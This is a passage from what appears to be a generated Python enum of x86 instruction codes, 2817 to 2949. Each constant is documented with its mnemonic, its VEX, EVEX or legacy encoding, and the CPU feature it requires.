``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2W_YMM_KR: int = 2817
"""
``VPMOVM2W ymm1, k1``
``EVEX.256.F3.0F38.W1 28 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2W_ZMM_KR: int = 2818
"""
``VPMOVM2W zmm1, k1``
``EVEX.512.F3.0F38.W1 28 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPEQQ_XMM_XMMM128: int = 2819
"""
``PCMPEQQ xmm1, xmm2/m128``
``66 0F 38 29 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPCMPEQQ_XMM_XMM_XMMM128: int = 2820
"""
``VPCMPEQQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPEQQ_YMM_YMM_YMMM256: int = 2821
"""
``VPCMPEQQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 29 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPEQQ_KR_K1_XMM_XMMM128B64: int = 2822
"""
``VPCMPEQQ k1 {k2}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPEQQ_KR_K1_YMM_YMMM256B64: int = 2823
"""
``VPCMPEQQ k1 {k2}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPEQQ_KR_K1_ZMM_ZMMM512B64: int = 2824
"""
``VPCMPEQQ k1 {k2}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 29 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVB2M_KR_XMM: int = 2825
"""
``VPMOVB2M k1, xmm1``
``EVEX.128.F3.0F38.W0 29 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVB2M_KR_YMM: int = 2826
"""
``VPMOVB2M k1, ymm1``
``EVEX.256.F3.0F38.W0 29 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVB2M_KR_ZMM: int = 2827
"""
``VPMOVB2M k1, zmm1``
``EVEX.512.F3.0F38.W0 29 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVW2M_KR_XMM: int = 2828
"""
``VPMOVW2M k1, xmm1``
``EVEX.128.F3.0F38.W1 29 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVW2M_KR_YMM: int = 2829
"""
``VPMOVW2M k1, ymm1``
``EVEX.256.F3.0F38.W1 29 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVW2M_KR_ZMM: int = 2830
"""
``VPMOVW2M k1, zmm1``
``EVEX.512.F3.0F38.W1 29 /r``
``AVX512BW``
``16/32/64-bit``
"""
MOVNTDQA_XMM_M128: int = 2831
"""
``MOVNTDQA xmm1, m128``
``66 0F 38 2A /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VMOVNTDQA_XMM_M128: int = 2832
"""
``VMOVNTDQA xmm1, m128``
``VEX.128.66.0F38.WIG 2A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVNTDQA_YMM_M256: int = 2833
"""
``VMOVNTDQA ymm1, m256``
``VEX.256.66.0F38.WIG 2A /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VMOVNTDQA_XMM_M128: int = 2834
"""
``VMOVNTDQA xmm1, m128``
``EVEX.128.66.0F38.W0 2A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTDQA_YMM_M256: int = 2835
"""
``VMOVNTDQA ymm1, m256``
``EVEX.256.66.0F38.W0 2A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTDQA_ZMM_M512: int = 2836
"""
``VMOVNTDQA zmm1, m512``
``EVEX.512.66.0F38.W0 2A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMB2Q_XMM_KR: int = 2837
"""
``VPBROADCASTMB2Q xmm1, k1``
``EVEX.128.F3.0F38.W1 2A /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMB2Q_YMM_KR: int = 2838
"""
``VPBROADCASTMB2Q ymm1, k1``
``EVEX.256.F3.0F38.W1 2A /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMB2Q_ZMM_KR: int = 2839
"""
``VPBROADCASTMB2Q zmm1, k1``
``EVEX.512.F3.0F38.W1 2A /r``
``AVX512CD``
``16/32/64-bit``
"""
PACKUSDW_XMM_XMMM128: int = 2840
"""
``PACKUSDW xmm1, xmm2/m128``
``66 0F 38 2B /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPACKUSDW_XMM_XMM_XMMM128: int = 2841
"""
``VPACKUSDW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPACKUSDW_YMM_YMM_YMMM256: int = 2842
"""
``VPACKUSDW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 2B /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPACKUSDW_XMM_K1Z_XMM_XMMM128B32: int = 2843
"""
``VPACKUSDW xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 2B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKUSDW_YMM_K1Z_YMM_YMMM256B32: int = 2844
"""
``VPACKUSDW ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 2B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKUSDW_ZMM_K1Z_ZMM_ZMMM512B32: int = 2845
"""
``VPACKUSDW zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 2B /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VMASKMOVPS_XMM_XMM_M128: int = 2846
"""
``VMASKMOVPS xmm1, xmm2, m128``
``VEX.128.66.0F38.W0 2C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPS_YMM_YMM_M256: int = 2847
"""
``VMASKMOVPS ymm1, ymm2, m256``
``VEX.256.66.0F38.W0 2C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSCALEFPS_XMM_K1Z_XMM_XMMM128B32: int = 2848
"""
``VSCALEFPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 2C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPS_YMM_K1Z_YMM_YMMM256B32: int = 2849
"""
``VSCALEFPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 2C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 2850
"""
``VSCALEFPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 2C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPD_XMM_K1Z_XMM_XMMM128B64: int = 2851
"""
``VSCALEFPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 2C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPD_YMM_K1Z_YMM_YMMM256B64: int = 2852
"""
``VSCALEFPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 2C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 2853
"""
``VSCALEFPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 2C /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VMASKMOVPD_XMM_XMM_M128: int = 2854
"""
``VMASKMOVPD xmm1, xmm2, m128``
``VEX.128.66.0F38.W0 2D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPD_YMM_YMM_M256: int = 2855
"""
``VMASKMOVPD ymm1, ymm2, m256``
``VEX.256.66.0F38.W0 2D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSCALEFSS_XMM_K1Z_XMM_XMMM32_ER: int = 2856
"""
``VSCALEFSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 2D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFSD_XMM_K1Z_XMM_XMMM64_ER: int = 2857
"""
``VSCALEFSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 2D /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VMASKMOVPS_M128_XMM_XMM: int = 2858
"""
``VMASKMOVPS m128, xmm1, xmm2``
``VEX.128.66.0F38.W0 2E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPS_M256_YMM_YMM: int = 2859
"""
``VMASKMOVPS m256, ymm1, ymm2``
``VEX.256.66.0F38.W0 2E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPD_M128_XMM_XMM: int = 2860
"""
``VMASKMOVPD m128, xmm1, xmm2``
``VEX.128.66.0F38.W0 2F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPD_M256_YMM_YMM: int = 2861
"""
``VMASKMOVPD m256, ymm1, ymm2``
``VEX.256.66.0F38.W0 2F /r``
``AVX``
``16/32/64-bit``
"""
PMOVZXBW_XMM_XMMM64: int = 2862
"""
``PMOVZXBW xmm1, xmm2/m64``
``66 0F 38 30 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXBW_XMM_XMMM64: int = 2863
"""
``VPMOVZXBW xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 30 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXBW_YMM_XMMM128: int = 2864
"""
``VPMOVZXBW ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 30 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXBW_XMM_K1Z_XMMM64: int = 2865
"""
``VPMOVZXBW xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.WIG 30 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVZXBW_YMM_K1Z_XMMM128: int = 2866
"""
``VPMOVZXBW ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.WIG 30 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVZXBW_ZMM_K1Z_YMMM256: int = 2867
"""
``VPMOVZXBW zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.WIG 30 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVWB_XMMM64_K1Z_XMM: int = 2868
"""
``VPMOVWB xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 30 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVWB_XMMM128_K1Z_YMM: int = 2869
"""
``VPMOVWB xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 30 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVWB_YMMM256_K1Z_ZMM: int = 2870
"""
``VPMOVWB ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 30 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMOVZXBD_XMM_XMMM32: int = 2871
"""
``PMOVZXBD xmm1, xmm2/m32``
``66 0F 38 31 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXBD_XMM_XMMM32: int = 2872
"""
``VPMOVZXBD xmm1, xmm2/m32``
``VEX.128.66.0F38.WIG 31 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXBD_YMM_XMMM64: int = 2873
"""
``VPMOVZXBD ymm1, xmm2/m64``
``VEX.256.66.0F38.WIG 31 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXBD_XMM_K1Z_XMMM32: int = 2874
"""
``VPMOVZXBD xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.WIG 31 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXBD_YMM_K1Z_XMMM64: int = 2875
"""
``VPMOVZXBD ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.WIG 31 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXBD_ZMM_K1Z_XMMM128: int = 2876
"""
``VPMOVZXBD zmm1 {k1}{z}, xmm2/m128``
``EVEX.512.66.0F38.WIG 31 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDB_XMMM32_K1Z_XMM: int = 2877
"""
``VPMOVDB xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 31 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDB_XMMM64_K1Z_YMM: int = 2878
"""
``VPMOVDB xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 31 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDB_XMMM128_K1Z_ZMM: int = 2879
"""
``VPMOVDB xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 31 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVZXBQ_XMM_XMMM16: int = 2880
"""
``PMOVZXBQ xmm1, xmm2/m16``
``66 0F 38 32 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXBQ_XMM_XMMM16: int = 2881
"""
``VPMOVZXBQ xmm1, xmm2/m16``
``VEX.128.66.0F38.WIG 32 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXBQ_YMM_XMMM32: int = 2882
"""
``VPMOVZXBQ ymm1, xmm2/m32``
``VEX.256.66.0F38.WIG 32 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXBQ_XMM_K1Z_XMMM16: int = 2883
"""
``VPMOVZXBQ xmm1 {k1}{z}, xmm2/m16``
``EVEX.128.66.0F38.WIG 32 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXBQ_YMM_K1Z_XMMM32: int = 2884
"""
``VPMOVZXBQ ymm1 {k1}{z}, xmm2/m32``
``EVEX.256.66.0F38.WIG 32 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXBQ_ZMM_K1Z_XMMM64: int = 2885
"""
``VPMOVZXBQ zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.WIG 32 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQB_XMMM16_K1Z_XMM: int = 2886
"""
``VPMOVQB xmm1/m16 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 32 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQB_XMMM32_K1Z_YMM: int = 2887
"""
``VPMOVQB xmm1/m32 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 32 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQB_XMMM64_K1Z_ZMM: int = 2888
"""
``VPMOVQB xmm1/m64 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 32 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVZXWD_XMM_XMMM64: int = 2889
"""
``PMOVZXWD xmm1, xmm2/m64``
``66 0F 38 33 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXWD_XMM_XMMM64: int = 2890
"""
``VPMOVZXWD xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 33 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXWD_YMM_XMMM128: int = 2891
"""
``VPMOVZXWD ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 33 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXWD_XMM_K1Z_XMMM64: int = 2892
"""
``VPMOVZXWD xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.WIG 33 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXWD_YMM_K1Z_XMMM128: int = 2893
"""
``VPMOVZXWD ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.WIG 33 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXWD_ZMM_K1Z_YMMM256: int = 2894
"""
``VPMOVZXWD zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.WIG 33 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDW_XMMM64_K1Z_XMM: int = 2895
"""
``VPMOVDW xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 33 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDW_XMMM128_K1Z_YMM: int = 2896
"""
``VPMOVDW xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 33 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDW_YMMM256_K1Z_ZMM: int = 2897
"""
``VPMOVDW ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 33 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVZXWQ_XMM_XMMM32: int = 2898
"""
``PMOVZXWQ xmm1, xmm2/m32``
``66 0F 38 34 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXWQ_XMM_XMMM32: int = 2899
"""
``VPMOVZXWQ xmm1, xmm2/m32``
``VEX.128.66.0F38.WIG 34 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXWQ_YMM_XMMM64: int = 2900
"""
``VPMOVZXWQ ymm1, xmm2/m64``
``VEX.256.66.0F38.WIG 34 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXWQ_XMM_K1Z_XMMM32: int = 2901
"""
``VPMOVZXWQ xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.WIG 34 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXWQ_YMM_K1Z_XMMM64: int = 2902
"""
``VPMOVZXWQ ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.WIG 34 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXWQ_ZMM_K1Z_XMMM128: int = 2903
"""
``VPMOVZXWQ zmm1 {k1}{z}, xmm2/m128``
``EVEX.512.66.0F38.WIG 34 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQW_XMMM32_K1Z_XMM: int = 2904
"""
``VPMOVQW xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 34 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQW_XMMM64_K1Z_YMM: int = 2905
"""
``VPMOVQW xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 34 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQW_XMMM128_K1Z_ZMM: int = 2906
"""
``VPMOVQW xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 34 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVZXDQ_XMM_XMMM64: int = 2907
"""
``PMOVZXDQ xmm1, xmm2/m64``
``66 0F 38 35 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXDQ_XMM_XMMM64: int = 2908
"""
``VPMOVZXDQ xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 35 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXDQ_YMM_XMMM128: int = 2909
"""
``VPMOVZXDQ ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 35 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXDQ_XMM_K1Z_XMMM64: int = 2910
"""
``VPMOVZXDQ xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W0 35 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXDQ_YMM_K1Z_XMMM128: int = 2911
"""
``VPMOVZXDQ ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.W0 35 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXDQ_ZMM_K1Z_YMMM256: int = 2912
"""
``VPMOVZXDQ zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.W0 35 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQD_XMMM64_K1Z_XMM: int = 2913
"""
``VPMOVQD xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 35 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQD_XMMM128_K1Z_YMM: int = 2914
"""
``VPMOVQD xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 35 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQD_YMMM256_K1Z_ZMM: int = 2915
"""
``VPMOVQD ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 35 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMD_YMM_YMM_YMMM256: int = 2916
"""
``VPERMD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 36 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMD_YMM_K1Z_YMM_YMMM256B32: int = 2917
"""
``VPERMD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 36 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2918
"""
``VPERMD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 36 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMQ_YMM_K1Z_YMM_YMMM256B64: int = 2919
"""
``VPERMQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 36 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2920
"""
``VPERMQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 36 /r``
``AVX512F``
``16/32/64-bit``
"""
PCMPGTQ_XMM_XMMM128: int = 2921
"""
``PCMPGTQ xmm1, xmm2/m128``
``66 0F 38 37 /r``
``SSE4.2``
``16/32/64-bit``
"""
VEX_VPCMPGTQ_XMM_XMM_XMMM128: int = 2922
"""
``VPCMPGTQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 37 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPGTQ_YMM_YMM_YMMM256: int = 2923
"""
``VPCMPGTQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 37 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPGTQ_KR_K1_XMM_XMMM128B64: int = 2924
"""
``VPCMPGTQ k1 {k2}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 37 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPGTQ_KR_K1_YMM_YMMM256B64: int = 2925
"""
``VPCMPGTQ k1 {k2}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 37 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPGTQ_KR_K1_ZMM_ZMMM512B64: int = 2926
"""
``VPCMPGTQ k1 {k2}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 37 /r``
``AVX512F``
``16/32/64-bit``
"""
PMINSB_XMM_XMMM128: int = 2927
"""
``PMINSB xmm1, xmm2/m128``
``66 0F 38 38 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMINSB_XMM_XMM_XMMM128: int = 2928
"""
``VPMINSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 38 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINSB_YMM_YMM_YMMM256: int = 2929
"""
``VPMINSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 38 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINSB_XMM_K1Z_XMM_XMMM128: int = 2930
"""
``VPMINSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 38 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINSB_YMM_K1Z_YMM_YMMM256: int = 2931
"""
``VPMINSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 38 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINSB_ZMM_K1Z_ZMM_ZMMM512: int = 2932
"""
``VPMINSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 38 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2D_XMM_KR: int = 2933
"""
``VPMOVM2D xmm1, k1``
``EVEX.128.F3.0F38.W0 38 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2D_YMM_KR: int = 2934
"""
``VPMOVM2D ymm1, k1``
``EVEX.256.F3.0F38.W0 38 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2D_ZMM_KR: int = 2935
"""
``VPMOVM2D zmm1, k1``
``EVEX.512.F3.0F38.W0 38 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2Q_XMM_KR: int = 2936
"""
``VPMOVM2Q xmm1, k1``
``EVEX.128.F3.0F38.W1 38 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2Q_YMM_KR: int = 2937
"""
``VPMOVM2Q ymm1, k1``
``EVEX.256.F3.0F38.W1 38 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2Q_ZMM_KR: int = 2938
"""
``VPMOVM2Q zmm1, k1``
``EVEX.512.F3.0F38.W1 38 /r``
``AVX512DQ``
``16/32/64-bit``
"""
PMINSD_XMM_XMMM128: int = 2939
"""
``PMINSD xmm1, xmm2/m128``
``66 0F 38 39 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMINSD_XMM_XMM_XMMM128: int = 2940
"""
``VPMINSD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 39 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINSD_YMM_YMM_YMMM256: int = 2941
"""
``VPMINSD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 39 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINSD_XMM_K1Z_XMM_XMMM128B32: int = 2942
"""
``VPMINSD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 39 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSD_YMM_K1Z_YMM_YMMM256B32: int = 2943
"""
``VPMINSD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 39 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2944
"""
``VPMINSD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 39 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSQ_XMM_K1Z_XMM_XMMM128B64: int = 2945
"""
``VPMINSQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 39 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSQ_YMM_K1Z_YMM_YMMM256B64: int = 2946
"""
``VPMINSQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 39 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2947
"""
``VPMINSQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 39 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVD2M_KR_XMM: int = 2948
"""
``VPMOVD2M k1, xmm1``
``EVEX.128.F3.0F38.W0 39 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVD2M_KR_YMM: int = 2949
"""
``VPMOVD2M k1, ymm1``
``EVEX.256.F3.0F38.W0 39 /r``
